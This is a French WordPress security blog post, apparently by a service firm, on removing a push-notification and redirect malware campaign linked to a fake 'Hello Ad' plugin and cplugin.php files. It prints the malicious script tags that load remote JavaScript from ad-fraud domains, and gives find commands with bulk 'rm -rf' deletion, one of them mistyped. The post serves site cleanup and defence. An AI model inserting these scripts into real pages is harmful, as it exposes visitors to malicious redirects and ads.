Comment nettoyer les malwares de notification push sous WordPress ?

Aujourd’hui je souhaite vous faire partager l’un des cas que j’ai rencontrés sur le site d’un client, qui est développé sous WordPress… qui s’est propagé comme une trainée de poudre. Des publicités intempestives, sous forme de notifications push, qui apparaissent aléatoirement, uniquement sur mobile. Un vrai casse tête difficilement reproductible. Il vous arrive la même chose ? Je vous montre comment nettoyer votre site !

Symptômes du malware Push Notifications sur WordPress

Depuis quelques mois, un malware de notifications push sur WordPress commence à pose pas mal de problème. Généralement cette campagne de hack, de piratage, est associée à une campagne de redirection.

On vous explique tout sur la campagne de redirection dans un prochain article.

Les pirates ont mis au point une campagne assez sophistiquée, par le biais d’un plugin « Hello add », d’apparence légitime, sur les sites infectés.

Notifications push vulgaires, redirection, tous les ingrédients de l’attaque

1. Notifications push vulgaires: vous ou les visiteurs voient apparaitre des notifications push malveillantes / vulgaires lorsqu’ils visitent votre site Web.
Exemple de publicités affichées avec des notifications push sur un site WordPress infecté
 
2. Redirection vers sites frauduleux : redirection vers des pages malveillantes en cliquant sur des liens de votre site, au lieu de conduire vers les pages de votre WordPress.
Exemple de redirection malveillante sur site internet WordPress
 
Pour vous donner une idée, voici quelques URL vers lesquelles votre site pourrait être redirigé
  • inpagepush [.] Com
  • asoulrox [.] Com
  • iclickcdn [ .] com

3. Plugins inconnus trouvés : dans certains cas, il est possible que vous identifiiez un nouveau plugin malveillant ajouté à WordPress sous le nom de « Hello ad ».

4. Virus spécifique à l’appareil / mobile uniquement: ce malware très sophistiqué a le don de bien se cacher. Il n’affichera pas toujours les notifications push ou ne redirigera pas les utilisateurs. Le comportement est spécifique à l’appareil.

Parfois, le logiciel malveillant affiche des notifications push uniquement sur les appareils mobiles et parfois il ne redirige que les nouveaux utilisateurs, pas quelqu’un qui a déjà ouvert le site plus tôt. C’est ce qui le rend vraiment très difficile à débusquer.

Le curieux plugin : Hello Ad

Dans certains cas, un plugin nommé « Hello Ad » est installé, permettant de rediriger les utilisateurs vers des sites internet malveillants, contrôlés par des pirates.

Il est également possible qu’il agisse par le biais d’un plugin qui n’apparait pas dans vos extensions par le biais d’un fichier nommé cplugin.php ou mplugin.php.

Quelle que soit la manière dont il apparait, il a pour but d’ajouter du code Javascript malveillant sur votre site. Il est possible qu’il ajoute le code suivant.

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script> <script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script> <script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>

Ce code malveillant joue un rôle essentiel dans les redirections ainsi que dans l’affichage des publicités vulgaires.

30 000 sites internet sont piratés chaque jour. Êtes-vous le prochain?

Sécurisez votre site contre les logiciels malveillants et les pirates dès aujourd'hui avec INNEO Technology avant qu'il ne soit trop tard.

Comment réparer votre site WordPress infecté par les Notifications Push, Hello Ad et CPlugin ?

1. Vérifiez les endroits préférés des pirates: il y a des endroits que les pirates préfèrent pour ajouter leur code malveillant. Commencer donc par examiner le fichier suivant :

  • index.php
  • wp-content/themes/{NomDeVotreTheme}/functions.php
  • wp-config.php
  • Fichiers de thème de base
  • .htaccess

2. Trouvez et supprimez le plugin Hello ad ou cplugin : si vous trouvez ce plugin « d’apparence légitime » que vous pensez que votre développeur ou vous avez peut-être installé dans le passé – veuillez le désinstaller car ce n’est pas le cas.

Généralement le plugin cplugin est juste un fichier cplugin.php situé dans /wp-content/plugins/cplugin.php. Supprimez-le.

3. Faites une recherche globale des fichiers malveillants : L’ensemble de ces malwares sont une vraie plaie et se propage très rapidement si vous avez plusieurs installations WordPress sur un même serveur.

Il est donc utile dans lancer une recherche globale sur votre serveur de ces scripts et fichiers malveillants.

Par le bai de votre accès SSH, saisissez les commandes suivantes. Elles vous retourneront le chemin d’accès des fichiers s’ils existent pour que vous puissiez aller les supprimer.

find . -iname "admin_ips.txt" find . -iname "cplugin.php" find . -iname "-inameplugin.php" find . -iname "wp-vcd.php" find . -iname "wp-tmp.php" find . -iname "wp-feed.php"

Si vous avez énormément d’installations de WordPress ou de fichiers, vous pouvez également utiliser les commandes suivantes qui supprimeront les fichiers en questions à l’instant où ils seront trouvés. Utilisez-les tout de même avec précautions. Si vous n’êtes pas sûr de ce que vous faites, privilégiez la suppression manuelle après vérification des fichiers.

find . -iname "admin_ips.txt" -exec rm -rf {} \; find . -iname "cplugin.php" -exec rm -rf {} \; find . -iname "mplugin.php" -exec rm -rf {} \; find . -iname "wp-vcd.php" -exec rm -rf {} \; find . -iname "wp-tmp.php" -exec rm -rf {} \; find . -iname "wp-feed.php" -exec rm -rf {} \;

Les pirates font constamment évoluer leurs méthodes, exploitent des vulnérabilités inconnues du monde entier pour créer un hack et infecter des milliers de sites WordPress chaque jour.

Supprimer et nettoyer sont WordPress est une chose, mais faire en sorte que cela soit pérenne et qu’il soit protéger 24h sur 24h et 7 jours sur 7, c’est une autre affaire.

Pensez à sécuriser votre site WordPress, quel que soit son influence, que ce soit un site personnel ou celui de votre entreprise. Il en va de votre image de marque.

Et surtout, n’hésitez pas à faire appel à un professionnel, il sera vous accompagner au mieux pour éviter les mauvaises surprises.

30 000 sites internet sont piratés chaque jour. Êtes-vous le prochain ?

Sécurisez votre site contre les logiciels malveillants et les pirates dès aujourd'hui avec INNEO Technology avant qu'il ne soit trop tard.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *